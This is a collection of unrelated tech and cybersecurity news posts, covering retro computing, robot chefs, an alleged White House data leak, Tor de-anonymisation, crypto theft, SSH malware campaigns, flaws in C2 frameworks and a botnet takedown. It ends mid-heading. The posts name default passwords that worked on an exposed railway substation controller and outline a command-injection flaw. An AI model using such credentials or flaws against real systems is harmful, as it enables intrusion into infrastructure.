It’s not uncommon for a new distro version to come out, and a grudging admission that maybe a faster laptop is on the cards. Perhaps after seeing this project though, you’ll never again complain about that two-generations-ago 64-bit multi-core behemoth, because [Dimitri Grinberg] — who else! — has succeeded in booting an up-to-date Linux on the real most basic of processors. We’re not talking about 386s, ATmegas, or 6502s, instead he’s gone right back to the beginning. The Intel 4004 was the first commercially available microprocessor back in 1971, and now it can run Linux.

So, given the 4004’s very limited architecture and 4-bit bus, how can it perform this impossible feat? As you might expect, the kernel isn’t being compiled to run natively on such ancient hardware. Instead he’s achieved the equally impossible-sounding task of writing a MIPS emulator for the venerable silicon, and paring back the emulated hardware to the extent that it remains capable given the limitations of the 1970s support chips in interfacing to the more recent parts such as RAM for the MIPS, an SD card, and a VFD display. The result is shown in the video below the break, and even though it’s sped up it’s clear that this is not a quick machine by any means.

We’d recommend the article as a good read even if you’ll never put Linux on a 4004, because of its detailed description of the architecture. Meanwhile we’ve had a few 4004 stories over the years, and this one’s not even the first time we’ve seen it emulate something else.

youtube.com/embed/NQZZ21WZZr0?…

hackaday.com/2024/09/21/theres…

Per la prima volta, l’Amministrazione della regolamentazione del mercato di Pechino ha rilasciato una licenza ai robot umanoidi per lavorare negli esercizi di ristorazione. Questa decisione apre definitivamente un nuovo capitolo nella storia della ristorazione.

Il pioniere è stata EncoSmart, azienda specializzata nello sviluppo di sistemi robotici. Ora i modelli della serie Lava potranno stare ai fornelli nei bar e nei ristoranti di tutta la capitale cinese.
Lava Iron di EncoSmart
Lava Iron di EncoSmart sono in grado di preparare una gamma di snack appetitosi. Il loro piatto forte sono le patatine dorate, che riescono a friggere in soli due minuti. Inoltre, gli chef meccanici hanno imparato l’arte di preparare ali di pollo croccanti e altri snack popolari. Ciò che è particolarmente piacevole è che il sistema migliora costantemente, padroneggiando autonomamente nuove ricette.

Secondo i creatori, uno dei principali vantaggi dei robot Lava è la loro capacità di identificare con precisione gli ingredienti e calcolare il tempo di cottura ideale per ciascun prodotto. Ciò è stato reso possibile grazie a tecnologie avanzate di percezione visiva.

youtube.com/embed/gIGXYbsx4ag?…

Nonostante il fatto che gli chef robotici stiano appena iniziando ad apparire nel Regno di Mezzo, il fondatore e CEO di EncoSmart Chen Zhen è fiducioso nel loro brillante futuro. A suo avviso, il rapido sviluppo della tecnologia e le dimensioni del mercato della ristorazione cinese creeranno le condizioni ideali per migliorare le abilità culinarie degli androidi.

“Il nostro compito principale ora è accumulare quanti più dati possibili sui vari scenari di utilizzo dei robot in cucina. Questo ci aiuterà a raggiungere e superare i principali concorrenti provenienti da Europa e Stati Uniti”, ha dichiarato Chen in un’intervista a Beijing News.

La decisione di rilasciare una licenza fa parte di un programma governativo su larga scala per accelerare l’introduzione dei robot umanoidi nei settori tradizionali dell’economia. Alla recente World Robot Conference tenutasi nella capitale cinese, il pubblico è rimasto colpito dagli sviluppi nazionali: robot in grado di disporre le merci sugli scaffali, distribuire medicinali nelle farmacie e persino svolgere i lavori domestici.
Immagine tratta dal World Robot Conference
EncoSmart, fondata nella primavera del 2022, è già riuscita ad attirare l’attenzione dei grandi investitori. Lo scorso aprile, la startup ha ricevuto un ingente finanziamento di 40 milioni di RMB (circa 5,6 milioni di dollari). Lo sponsor principale era ZhenFund, e tra gli altri partecipanti figuravano attori famosi come Decent Capital e la divisione di venture capital di Joyoung, uno dei principali produttori di elettrodomestici del paese.

La comparsa degli chef robot negli stabilimenti di Pechino potrebbe essere l’inizio di una rivoluzione culinaria. Ciò non solo accelererà il processo di cottura e aumenterà l’efficienza della ristorazione, ma aprirà anche nuovi orizzonti per gli esperimenti gastronomici. Resta però la domanda: come reagiranno i commensali al cibo preparato dalle macchine? E, soprattutto, quale destino attende in futuro le persone che da anni padroneggiano le complessità della professione?

L'articolo I Robot Umanoidi Conquistano i Ristoranti! Quale sarà il futuro dei lavoratori nella ristorazione? proviene da il blog della sicurezza informatica.

Recentemente, un attore di minacce su un forum clandestino ha pubblicato una presunta violazione dei dati riguardante WhiteHouse[.]gov. Il post, realizzato da un utente di nome “l33tfg“, afferma che informazioni sensibili provenienti dal sito ufficiale della Casa Bianca sono state esposte. Secondo quanto dichiarato, i dati includono email, nomi, numeri di telefono, hash e indirizzi IP.

Al momento non possiamo confermare la veridicità della notizia, in quanto l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web in merito all’incidente. Pertanto, questo articolo deve essere considerato come una “fonte di intelligence”.

Dettagli della presunta violazione

Nel post sul forum, l’attore ha fornito un campione dei dati compromessi, affermando che proviene direttamente dal dominio WhiteHouse.gov. Il post specifica che la violazione completa include dettagli sensibili come indirizzi email, numeri di telefono, hash e indirizzi IP. Viene inoltre fornito un link a quello che viene descritto come il “FULL LEAK.”

Sebbene non divulgheremo alcuna informazione sensibile in questo articolo, è importante notare che i dati condivisi sembrano autentici, basandosi sulla formattazione e sulla struttura tipica dei record compromessi.

Informazioni sull’obiettivo degli attori della minaccia

WhiteHouse.gov è il sito ufficiale della Casa Bianca ed è una risorsa digitale cruciale per il ramo esecutivo del governo degli Stati Uniti. Il sito contiene una vasta quantità di informazioni pubbliche e funge da piattaforma di comunicazione per il governo. L’organizzazione che gestisce il sito è responsabile di vari stakeholder, inclusi cittadini, giornalisti e decisori politici. Data la natura ad alto profilo dell’istituzione, qualsiasi compromissione potrebbe avere conseguenze su vasta scala.

Implicazioni della violazione

Se la presunta violazione fosse autentica, l’esposizione di dati come email, numeri di telefono e indirizzi IP potrebbe causare gravi preoccupazioni per la sicurezza. Ad esempio, potrebbe aprire la strada ad ulteriori attacchi di phishing rivolti a funzionari governativi o altro personale associato alla Casa Bianca. Inoltre, l’esposizione di password hashate o di altre forme di autenticazione potrebbe consentire agli attori di minacce di ottenere accessi non autorizzati a aree riservate della rete, potenzialmente portando a compromissioni più gravi di dati governativi.

La fuga di informazioni potrebbe anche danneggiare la fiducia pubblica nell’istituzione, in particolare se venissero rivelate informazioni sensibili o classificate. Criminali informatici e attori statali potrebbero sfruttare tali informazioni per attività di intelligence o azioni malevole.

Conclusione

RHC Dark Lab seguirà l’evolversi della situazione per pubblicare ulteriori notizie sul blog, qualora ci fossero aggiornamenti sostanziali. Se ci sono persone a conoscenza dei fatti che desiderano fornire informazioni in forma anonima, possono utilizzare l’e-mail criptata dell’informatore.

Questo articolo è stato redatto sulla base di informazioni pubbliche non ancora verificate dalle rispettive organizzazioni. Aggiorneremo i nostri lettori non appena saranno disponibili ulteriori dettagli.

L'articolo Lo Zio Sam è in Pericolo! I dati della Casa Bianca pubblicati su Breach Forums proviene da il blog della sicurezza informatica.

Notion, uno degli strumenti di produttività più conosciuti e apprezzati, ha annunciato il suo ritiro definitivo dal mercato russo, con effetto dal 9 settembre. L’azienda chiuderà tutti gli spazi di lavoro e gli account degli utenti russi a causa delle rigide restrizioni sui servizi software imposte dal governo statunitense, che hanno reso impossibili le sue operazioni in Russia.

Questo sviluppo mette in evidenza le enormi sfide che i servizi internet globali devono affrontare a causa delle normative nazionali e delle sanzioni internazionali.

I 10 principali servizi online banditi dalla Russia

1. Notion: Il famoso strumento di produttività chiuderà gli spazi di lavoro e gli account degli utenti russi a partire dal 9 settembre 2024.
2. Facebook: Bandito nel 2022 per non aver rispettato le norme di censura del governo russo, accusato di diffondere “disinformazione”.
3. Signal: Questa app di messaggistica sicura è stata bandita ad agosto 2024 per violazioni delle leggi antiterrorismo e antiestremismo.
4. Twitter: Dopo restrizioni iniziate nel 2021, Twitter è stato completamente bloccato nel 2022 per non aver rimosso contenuti considerati “illegali”.
5. Telegram: Bandito dal 2018 al 2020 per non aver fornito dati criptati alle autorità russe, anche se il divieto è stato revocato, la piattaforma è sottoposta a stretta supervisione.
6. LinkedIn: Bloccato dal 2016 per non aver rispettato le leggi sulla localizzazione dei dati dei cittadini russi.
7. Zoom: Sebbene non completamente vietato, il suo uso in Russia è stato limitato e monitorato nel 2022, soprattutto per questioni legate al governo e alle infrastrutture critiche.
8. ProtonVPN: Bandito nel 2020 e recentemente rimosso dall’App Store russo insieme ad altri fornitori di VPN per non aver rispettato le normative sull’archiviazione dei dati.
9. Google Docs: Sebbene non completamente bloccato, Google Docs ha subito restrizioni parziali nel 2022 per la diffusione di contenuti non censurati.
10. Spotify: Ritiratosi dal mercato russo nel 2022 a causa della rigorosa censura dei contenuti sulla piattaforma.

Questi blocchi mettono in luce la crescente preoccupazione per le difficoltà che i servizi globali stanno affrontando nel destreggiarsi tra le intricanti normative e sanzioni internazionali.

La situazione evidenzia quanto sia fragile l’accesso a strumenti fondamentali in un contesto globale sempre più regolato e complesso oltre che spaccato da conflitti e da influenze economiche.

L'articolo Muri Digitali: I 10 Servizi online più popolari che la Russia ha oscurato proviene da il blog della sicurezza informatica.

Buon sabato e ben ritrovato caro cyber User.

Benvenuti al nostro aggiornamento settimanale sugli scenari cyber. Questa settimana il German law enforcement ha compiuto importanti operazioni contro il crimine informatico, smantellando le infrastrutture del gruppo ransomware Vanir Locker e chiudendo 47 exchange di criptovalute utilizzati per il riciclaggio di denaro.

Queste azioni hanno incluso il sequestro di un sito di data leak, impedendo la pubblicazione di dati rubati e reindirizzando gli utenti a una pagina informativa sulle attività ingannevoli degli exchange coinvolti. In un'altra operazione globale, chiamata Operation Kaerb, è stata smantellata una rete criminale che utilizzava la piattaforma iServer per attacchi di phishing automatizzati, colpendo 483.000 vittime in tutto il mondo e portando all'arresto di 17 sospetti.

La CISA e l'FBI hanno emesso un avviso "Secure by Design" per invitare i produttori di software a riconsiderare le loro pratiche, in risposta alla diffusione delle vulnerabilità di cross-site scripting (XSS). Questo avviso fornisce principi e azioni concrete per eliminare queste vulnerabilità durante le fasi di progettazione e sviluppo.

Un'altra operazione ha portato alla disattivazione di una vasta botnet cinese chiamata Raptor Train, che mirava a infrastrutture critiche negli Stati Uniti e in altri paesi, infettando oltre 260.000 dispositivi. La botnet era legata a criminali sponsorizzati dallo stato cinese.

In ambito ransomware, il gruppo Vanilla Tempest ha preso di mira il settore sanitario statunitense utilizzando l'INC ransomware. Nel frattempo, i criminali informatici stanno sfruttando GitHub per diffondere Lumma Stealer attraverso false segnalazioni di vulnerabilità e avvisi di phishing.

Attacchi recenti hanno visto anche l'utilizzo del malware RustDoor da parte di hacker nordcoreani su LinkedIn, mentre Binance ha avvisato gli utenti riguardo a un aumento degli attacchi di clipper malware che rubano dati sensibili relativi ai portafogli di criptovalute.

Infine, una campagna sofisticata ha preso di mira i partecipanti alla Conferenza sull'Industria della Difesa USA-Taiwan con archivi ZIP malevoli, mentre un malware chiamato StealC ha bloccato gli utenti in modalità kiosk per rubare le credenziali Google.

Questi eventi evidenziano la crescente complessità e pericolosità delle minacce informatiche globali e l'importanza della sicurezza informatica proattiva.

😋 FunFact

Il funfact di oggi è quantomeno curioso. Un programma scritto in Go per offuscare il codice negli script PowerShell, di modo da rendere l’analisi e il rilevamento molto più complicato. 5 livelli di offuscamento fino alla frammentazione dello script.

Anche quest'oggi abbiamo concluso, ti ringrazio per il tempo e l'attenzione che mi hai dedicato, augurandoti buon fine settimana, ti rimando al mio blog e alla prossima settimana per un nuovo appuntamento con NINAsec.

buttondown.com/ninasec/archive…

Lisp is one of those programming languages that seems to keep taunting us for not learning it properly. It is still used for teaching functional languages today. [Adam McDaniel] has an obvious fondness for this fifty-year-old language and has used it in several projects, including their own shell, Dune.

Dune is a shell designed for powerful scripting. Think of it as an unholy combination of bash and Lisp.

Dune is designed to be highly customisable, allowing you to create a super-optimised workstation for your admin and programming tasks. [Adam] describes the front end for Dune as having turned up the cosiness dial to eleven, and we can see that. A cosy home is personalised, and Dune lets you customise everything.

Dune is a useable functional programming environment with a reasonably complete standard library to back it up, which should simplify some of the more complicated sysadmin tasks. [Adam] says the language also supports a few metaprogramming concepts, such as a quote operator, operator overloading, and macro programming. It’s difficult to describe much more about what you can do with Dune, as it’s a general-purpose programming language wrapped in a shell. The possibilities are endless, and [Adam] is looking forward to seeing what you lot out there do with his project!

The shell can be personalised by editing the prelude file, which allows you to overload functions for the prompt text, the incomplete prompt text (so you can implement intelligent completion options), and a function that deals with the formatting of the command response text. [Adam] gives us his personal prelude file, which defines many helper functions displaying useful things such as the current weather, a calendar, and an ASCII art cat. You never know when that might come in handy. This file is written in Lisp, so we reckon that’s where many people will start as they come up the Lisp (re)learning curve before embarking on more involved automation. Dune was written in Rust, so you need that infrastructure to install it with Cargo.

As we said earlier, Lisp is not a new language. We found a hack for porting a Lisp interpreter to any old language and also running Lisp bare metal on a Lisp machine. Finally, [Al] takes a look at some alternative shells.

hackaday.com/2024/09/20/get-yo…

As anyone who’s looked at the sky just before dawn or right after dusk can confirm, for the last seventy years or so there have been all kinds of artificial satellites floating around in low-Earth orbit that are visible to the naked eye. Perhaps the most famous in the last few decades is the International Space Station, but there are all kinds of others up there from amateur radio satellites, the Starlink constellation, satellite TV, and, of course, various spy satellites from a few of the world’s governments. [Felix] seems to have found one and his images of it can be found here.

[Felix] has been taking pictures of the night sky for a while now, including many different satellites. While plenty of satellites publish their paths to enable use, spy satellites aren’t generally public record but are still able to be located nonetheless. He uses a large Dobsonian telescope to resolve the images of several different satellites speculated to be spy satellites, with at least one hosting a synthetic aperture radar (SAR) system. His images are good enough to deduce the size and shape of the antennas used, as well as the size of the solar panels on board.

As far as being concerned about the ramifications of imaging top-secret technology, [Felix] is not too concerned. He states that it’s likely that most rival governments would be able to observe these satellites with much more powerful telescopes that he has, so nothing he has published so far is likely to be a surprise to anyone. Besides, these aren’t exactly hidden away, either; they’re up in the sky for anyone to see. If you want to take a shot at that yourself you can get a Dobsonian-like telescope mostly from parts at Ikea, and use a bit of off-the-shelf electronics to point them at just the right position too.

hackaday.com/2024/09/20/amateu…

One of the hardest things about studying electricity, and by extension electronics, is that you generally can’t touch or see anything directly, and if you can you’re generally having a pretty bad day. For teaching something that’s almost always invisible, educators have come up with a number of analogies for helping students understand the inner workings of this mysterious phenomenon like the water analogy or mechanical analogs to electronic circuits. One of [Thomas]’s problems with most of these devices, though, is that they don’t have any amplification or “fan-out” capability like a real electronic circuit would. He’s solved that with a unique mechanical amplifier.

Digital logic circuits generally have input power and ground connections in addition to their logic connection points, so [Thomas]’s main breakthrough here is that the mechanical equivalent should as well. His uses a motor driving a shaft with a set of pulleys, each of which has a fixed string wrapped around the pulley. That string is attached to a second string which is controlled by an input. When the input is moved the string on the pulley moves as well but the pulley adds a considerable amount of power to to the output which can eventually be used to drive a much larger number of inputs. In electronics, the ability to drive a certain number of inputs from a single output is called “fan-out” and this device has an equivalent fan-out of around 10, meaning each output can drive ten inputs.

[Thomas] calls his invention capstan lever logic, presumably named after a type of winch used on sailing vessels. In this case, the capstan is the driven pulley system. The linked video shows him creating a number of equivalent circuits starting with an inverter and working his way up to a half adder and an RS flip-flop. While the amplifier pulley does take a minute to wrap one’s mind around, it really helps make the equivalent electronic circuit more intuitive. We’ve seen similar builds before as well which use pulleys to demonstrate electronic circuits, but in a slightly different manner than this build does.

youtube.com/embed/Lt0alWQzkWY?…

hackaday.com/2024/09/20/mechan…

Although initially defined as an issue with GPIO inputs when configured with the internal pull-downs enabled, erratum RP2350-E9 has recently been redefined in the datasheet (page 1341) as a case of increased leakage current. As it is now understood since we previously reported, the issue occurs when a GPIO (0 – 47) is configured as input, the input buffer is enabled and the pad voltage is somewhere between logic LOW and HIGH. In that case leakage current can be as high as 120 µA with IO_VDD = 3.3V. This leakage current is too much for the internal pull-up to overcome, ergo the need for an external pull-down (8.2 kΩ or less, per the erratum). Disabling the input buffer will stop the leakage current, but reading the input requires re-enabling the buffer.
GPIO Pad leakage for IOVDD=3.3 V (Credit: Raspberry Pi)
The upshot of this issue is that for input applications, the internal pull-downs are useless, and since PIO applications cannot toggle pad controls the input buffer toggling workaround is not an option. ADC usage requires one to clear the GPIO input enable. In general any circuit that relies on floating pins or an internal pull-down resistor will be affected.

Although this should mean that the affected A2 stepping of the RP3450 MCU can still be used for applications where this is not an issue, and external pull-downs can be used as a ‘fix’ at the cost of extra power usage, it makes what should have been a drop-in replacement a troubled chip at best. At this point there have still been no definite statements from Raspberry Pi regarding a new (B0) stepping, leaving RP MCU users with the choice between the less flashy RP2040 and the buggy RP2350 for the foreseeable future.

Header: Thomas Amberg, CC BY-SA 2.0.

hackaday.com/2024/09/20/raspbe…

There’s a special kind of satisfaction found in the act of repairing a previously broken devices, which is why YouTube is full of repair channels and guides on how to do it yourself. Inspired by this, [Doug Brown] decided to give it a shot himself, with an Elgato HD60 S HDMI capture device as the patient. As per the eBay listing, the device did not show up as a USB device when connected to a computer — a quick probing of the innards revealed that not only were the board voltages being dragged down, but some of the components on the PCB were getting suspiciously hot.
One of the broken switching regulators on the Elgato HD60 S capture device PCB. (Credit: Doug Brown)
On a thermal camera the hot components in question turned out to part of the voltage regulator circuits, one a switching regulator (marked fiVJVE, for Fitipower FP6373A) and another a voltage inverter marked PFNI (Ti TPS60403DBV).

Since both took 5 V, the suspicion was an over-voltage event on the USB side. After replacing the FP6373A and TPS60403 with newly purchased ones, the voltage rails were indeed healthy, and the Elgato sprung to life and could be used for HDMI capture and pass-through. However, the device’s onboard LEDs stubbornly refused to follow the boot-up pattern or show any other color patterns. Was this just a busted Innotech IT1504 LED driver IC?

Swapping it with a pin-compatible Macroblock MB15040 didn’t improve the situation, and the LEDs worked fine when externally controlling the MB15040 on its SPI bus, as well as with the original IT1504. Asking Elgato whether there was a known issue with these status LEDs didn’t lead to anything, so [Doug] decided to tackle the presumed source of the problem: the Nuvoton M031LD2AE MCU that’s supposed to drive the LED driver IC. The PCB helpfully provides a 4-pin JST connector on the board for the MCU’s SWD interface, but Elgato did protect the flash contents, so a straight dump wasn’t going to work.

The binary firmware is however helpfully available from Elgato, with the MCU already running the latest version. This is the point where [Doug] loaded the firmware into Ghidra to begin to understand what exactly this firmware was supposed to be doing. Putting on a fresh MCU with the correct firmware definitely worked, but debugging was hard as the new MCU also enabled protections, so in Ghidra the offending code for this was identified and neutralized, finally allowing for on-chip debugging and leading down another rabbit hole only to find an SPI flash chip at the end.

Ultimately it turned out that all the hardware was working fine. The problem ended up being that the LED patterns stored on the SPI EEPROM had become corrupted, which caused the Nuvoton MCU to skip over them. The same issue was confirmed on a second HD60 S, which makes it seem that this is a common issue with these Elgato capture devices. As a next step [Doug] hopes to figure out a way to more easily fix this issue, as even the streamlined process is still quite convoluted. Whether it is an issue with Elgato’s software or firmware (updater) is unknown at this point, but at least there seems to be a fix for now, even if Elgato support seems to just tell owners to ‘ignore it if capturing works’.

There’s nothing quite as inspirational as reading about a successful repair. If you need another shot of endorphins, check out the work [BuyItFixIt] put into a video baby monitor to bring it back online.

hackaday.com/2024/09/20/fixing…

Gli sviluppatori del progetto Tor hanno assicurato agli utenti che il browser e la rete Tor sono ancora sicuri. Il fatto è che recentemente su Internet sono apparse informazioni secondo cui le forze dell’ordine in Germania e in altri paesi stanno lavorando insieme per rendere anonimi gli utenti utilizzando attacchi temporali.

Recentemente in un rapporto congiunto della pubblicazione tedesca Panorama e del canale YouTube investigativo STRG_F è emerso che l’Ufficio federale tedesco della polizia criminale (BKA) e la Procura generale di Francoforte sono riusciti a identificare almeno un utente Tor. La pubblicazione menziona l’“analisi temporale” come chiave per la de-anonimizzazione.

“In base alla tempistica dei singoli pacchetti, le connessioni anonime possono essere ricondotte a un determinato utente Tor, anche se le connessioni nella rete Tor vengono crittografate più volte”, riferiscono i giornalisti, ma non spiegano come funziona esattamente questa tecnica.

In teoria, l’osservazione a lungo termine di determinate tendenze, come suggerito dalla metodologia di analisi temporale, potrebbe effettivamente fornire agli osservatori alcuni indizi sugli utenti che inviano traffico alla rete.

In sostanza, qualcuno può aggiungere i propri nodi alla rete Tor e registrare l’ora in cui i pacchetti entrano nella rete e ne escono. Dopo un po’ di tempo, in base ai parametri temporali ricevuti, sarà possibile determinare chi si sta connettendo a un particolare servizio .onion.

Allo stesso tempo, Matthias Marx, un rappresentante della famosa comunità di hacker Chaos Computer Club (CCC), ha confermato ai media che le prove disponibili (documenti e altre informazioni raccolte dai giornalisti) “dimostrano che le forze dell’ordine hanno ripetutamente e con successo effettuato attacchi contro singoli utenti allo scopo di de-anonimizzazione.”

In risposta a questa pubblicazione, il team Tor ha scritto sul blog che chiunque utilizzi le ultime versioni degli strumenti del progetto Tor è al sicuro e che gli attacchi temporali sono una tecnica nota per la quale esistono da tempo difese efficaci.

The Tor Project rileva di non aver visto tutti i documenti (sebbene li abbia richiesti ai giornalisti), ma ritiene che la polizia tedesca sia stata in grado di identificare un utente Tor specifico perché utilizzava un software obsoleto e non perché le forze dell’ordine hanno approfittato di una vulnerabilità sconosciuta o riscontrato un uso efficace degli attacchi temporali.

Pertanto, secondo i ricercatori tedeschi, durante le indagini contro una persona conosciuta come Andres G. è stato utilizzato un attacco temporale. Le forze dell’ordine lo consideravano l’operatore della risorsa Boystown, che pubblicava materiali sugli abusi sessuali sui minori (CSAM), che cioè, pornografia infantile.

Si presume che Andres G abbia utilizzato il messenger anonimo Ricochet, che trasmette dati tra mittente e destinatario tramite Tor. Inoltre, si presume che abbia utilizzato una versione che non poteva proteggere le sue connessioni Tor dalla de-anonimizzazione attraverso attacchi temporali, come è stato utilizzato dalla polizia.

Presumibilmente le autorità tedesche si sono avvalse dell’aiuto dell’operatore Telefónica, che ha fornito dati su tutti i client O2 che si collegavano al noto nodo Tor. Confrontando queste informazioni con i dati di analisi temporale ha permesso alle autorità di identificare Andres G, che alla fine fu arrestato, accusato, condannato e imprigionato nel 2022.

Gli sviluppatori Tor scrivono che è improbabile che il metodo descritto indichi una vulnerabilità di Tor.

L'articolo Tor è davvero sicuro? Come è stato Smascherato un Utente con un attacco temporale! proviene da il blog della sicurezza informatica.

Due sospetti sono stati arrestati questa settimana a Miami, accusati di aver cospirato per rubare e riciclare più di 230 milioni di dollari in criptovalute utilizzando scambi di criptovalute e servizi di mixaggio. I due uomini in questione sono Malone Lama, 20 anni, alias “Greavys”, “Anne Hathaway” e “$$$”, e Jandiel Serrano, 21 anni, alias “Box”, “VersaceGod” e “@ SkidStar”. Entrambi gli imputati sono stati arrestati dagli agenti dell’FBI mercoledì sera e sono comparsi in tribunale il giorno successivo.

Come risulta dal fascicolo, il 18 agosto Lam, Serrano e i loro complici hanno effettuato con successo un attacco, durante il quale hanno rubato più di 4.100 Bitcoin a una vittima a Washington DC. A quel tempo, il valore dei beni rubati superava i 230 milioni di dollari. Secondo l’indagine, gli aggressori hanno ottenuto l’accesso non autorizzato ai conti crittografici delle vittime e hanno trasferito fondi sui loro portafogli crittografici, per poi riciclare i beni rubati.

Per nascondere le loro attività, i sospettati hanno utilizzato una combinazione di metodi: mixer di criptovaluta, scambi, catene di transazioni e portafogli pass-through. Anche le reti private virtuali (VPN) venivano utilizzate per nascondere le proprie identità e posizioni. Questi schemi hanno consentito ai truffatori di operare inosservati fino a quando non sono stati scoperti da difetti di sicurezza operativa e da molteplici acquisti costosi.

Dall’indagine è emerso che la criptovaluta rubata veniva utilizzata per finanziare lo stile di vita lussuoso dei sospettati. Hanno speso soldi in viaggi internazionali, acquistando auto costose, orologi di lusso, borse firmate e intrattenimento nei nightclub di Los Angeles e Miami.

Un’indagine condotta dallo specialista in frodi di criptovaluta ZachXBT ha aiutato a identificare un terzo presunto partecipante allo schema, noto con lo pseudonimo di “Wiz“. Il gruppo di truffatori, secondo l’esperto, ha utilizzato numeri di telefono falsi e si è spacciato per dipendenti di Google e del servizio di supporto dell’exchange di criptovalute Gemini per accedere ai conti delle vittime. In un caso, hanno convinto la vittima a reimpostare l’autenticazione a due fattori e a trasferire il controllo del suo schermo tramite l’applicazione di accesso remoto AnyDesk, che ha permesso loro di rubare chiavi private e rubare fondi dai portafogli crittografici.

Secondo ZachXBT, il monitoraggio iniziale ha mostrato che i 243 milioni di dollari rubati sono stati divisi tra i membri del gruppo e poi trasferiti attraverso più di 15 scambi. I fondi sono stati convertiti tra varie criptovalute, tra cui Bitcoin, Litecoin, Ethereum e Monero, rendendoli difficili da rintracciare.

Nonostante gli sforzi per coprire le loro tracce, gli investigatori hanno scoperto che un gruppo di indirizzi Ethereum collegati a Serrano e Wiz ha ricevuto più di 41 milioni di dollari da due scambi di criptovaluta nelle ultime settimane. Errori nel processo di riciclaggio di denaro, incluso l’uso imprudente di uno schermo durante una transazione in cui Wiz ha rivelato accidentalmente il suo vero nome, hanno portato alla sua esposizione.

Gli investigatori hanno inoltre scoperto che una parte significativa dei fondi veniva convertita in Monero per aumentare l’anonimato, ma errori nelle transazioni hanno permesso di collegare i fondi riciclati agli importi originariamente rubati. Ciò ha aiutato gli investigatori a rintracciare i sospetti, che alla fine hanno portato agli arresti.

L’FBI è riuscita ad arrestare Lam e Serrano attraverso l’analisi delle loro spese sontuose e dell’attività sui social media, dove i loro amici hanno rivelato accidentalmente le loro posizioni a Los Angeles e Miami. Il caso resta sotto inchiesta e le forze dell’ordine non hanno escluso la possibilità di ulteriori arresti.

L'articolo Quando il lusso diventa un malware! Gli Hacker rubano 230 milioni di dollari ma vengono traditi dalle spese folli proviene da il blog della sicurezza informatica.

[Lynnadeng]’s team wanted to monitor the Los Angeles River over time and wanted citizen scientists — or anyone, for that matter — to help. They built a dual phone holder to allow random passersby to use their phones to take photos. A QR code lets them easily send the pictures to the team. The 3D printed holder is fixed in place and has a known gap that allows stereo reconstruction from pairs of photos.

Of course, people aren’t going to know what to do, so you need a sign with instructions along with the QR code. One advantage to this scheme is that it’s cheap. All the camera hardware is in the public’s phone. Of course, you still have to make the holder robust to the elements, but that’s not nearly as difficult as supplying power and weatherproofing cameras and radios.

The real interesting part is the software. At first, we were disappointed that the post had a dead link to GitHub, but it was easy enough to find the correct one. In some cases, people will use a single camera, so 3D reconstruction isn’t always possible.

We love citizen science around here. No matter where you live, there are many opportunities to contribute.

hackaday.com/2024/09/20/inviti…

I ricercatori dell’ASEC hanno identificato nuovi attacchi contro i server SSH Linux poco protetti. In essi, gli hacker hanno utilizzato il malware Supershell scritto in Go. Questa backdoor offre agli aggressori il controllo remoto sui sistemi compromessi.

Dopo l’infezione iniziale, gli hacker avviano gli scanner per cercare altri obiettivi vulnerabili. Si ritiene che questi attacchi vengano effettuati utilizzando dizionari di password ottenuti da server già infetti.

Gli aggressori utilizzano i comandi wget, curl, tftp e ftpget per scaricare ed eseguire script dannosi. Questi script consentono di ottenere pieno accesso al sistema e installare malware aggiuntivo, quindi nascondere le tracce dell’attacco eliminando i file scaricati.

Installando una backdoor, gli hacker possono installare minatori di criptovaluta nascosti come XMRig su host infetti, che è un tipico modello di attacco sui server Linux vulnerabili. Nella campagna in esame gli hacker hanno utilizzato anche Cobalt Strike per configurare l’accesso remoto e ElfMiner per installare crypto miner.

Gli esperti raccomandano agli amministratori di rafforzare la sicurezza dei propri sistemi, aggiornare regolarmente il software, utilizzare password complesse e abilitare i firewall per ridurre al minimo il rischio di infezione.

L'articolo Nuovi Attacchi ai Server SSH Linux: Malware Supershell Compromette i Sistemi Vulnerabili proviene da il blog della sicurezza informatica.

Open Source has sort of eaten everything in software these days. And that includes malware, apparently, with open source Command and Control (C2) frameworks like Sliver and Havoc gaining traction. And of course, this oddball intersection of Open Source and security has intrigued at least one security researcher who has found some interesting vulnerabilities.

Before we dive into what was found, you may wonder why open source malware tools exist. First off, trustworthy C2 servers are quite useful for researchers, who need access to such tools for testing. Then there is Red Teaming, where a security professional launches a mock attack against a target to test its defenses. A C2 is often useful for education and hobby level work, and then there are the true criminals that do use these Open Source tools. It takes all types.

A C2 system consists of an agent installed on compromised systems, usually aiming for stealth. These agents connect to a central server, sending information and then executing any instructions given. And finally there’s a client, which is often just a web interface or even a command line interface.

Now what sort of fun is possible in these C2 systems? Up first is Sliver, written in Go, with a retro command line interface. Sliver supports launching Metasploit on compromised hosts. Turns out, it accidentally supported running Metasploit modules against the server’s OS itself, leading to an easy remote shell from an authenticated controller account.

Havoc has a fancy user interface for the clients, and also a command injection flaw. A service name field gets used to generate a shell command, so you’re only a simple escape away from running commands. That’s not quite as useful as the API that failed open when a bad username/password was given. Oops.

Trains!

[Bertin Jose] has a bit of a side hobby, of scanning the Internet for interesting endpoints, with an emphasis on industrial control systems. In an automated scan, a CZAT7 device popped up — a traction power substation controller. This is a miniature power station that supplies power to electric railways. And this one was not only connected to the Internet, it exposed a web interface that probably wasn’t intended to be public. And it included coordinates. It’s delightful that we can point to a picture on Google Maps, to the little building in Poland where this controller lives.

[Bertin] has enough experience with control devices like these, to know that 1111 is a common password. It’s wild that for these devices, both 1111 and 2222 worked for read/write access to the devices. This is where there was clearly a line, where fiddling around further inside these real devices would be ill-advised. What turned out to be more of a problem is finding the right people to disclose the device to. There was never a response, but the device seems to be finally off the Internet.

Raptor Train

We have news this week of a joint effort between Lumen Technologies and the US DoJ to take down the Raptor Train, a botnet that lives on a variety of routers, IoT devices, and cameras and NVRs. This botnet is interesting, that each device was only compromised for an average of 17 days at a time, with the infection only persisting until the next reboot.

What’s always fun about watching malware activity like this is to line up activity with timezones around the world. This one roughly corresponds to a 10:00 AM to 7:00 PM working day in China Standard Time, which checks out with the likely attribution to the Chinese group, Flax Typhoon. The count of total devices was somewhere around 260,000, with exploitation due to a combination of 0-day and n-day vulnerabilities. Turns out maybe it’s not a great idea to put those cameras on the Internet.

Discord and DAVE

Discord has rolled out DAVE, Discord Audio and Video end-to-end Encryption. This new solution will provide encryption for voice and video for DMs, Group DMs, and other live calls on Discord. The solution is Open Source, and was designed in collaboration with trailofbits.

Lots of established cryptography was used, and at a brief look the scheme seems to check out. Notably missing is any mention of quantum-resistant cryptography. That’s not entirely unexpected, as we’re still several years away from practical quantum computers, and the cryptography schemes designed to be immune to quantum cryptography are still quite new and immature.

The Other Side of the Coin

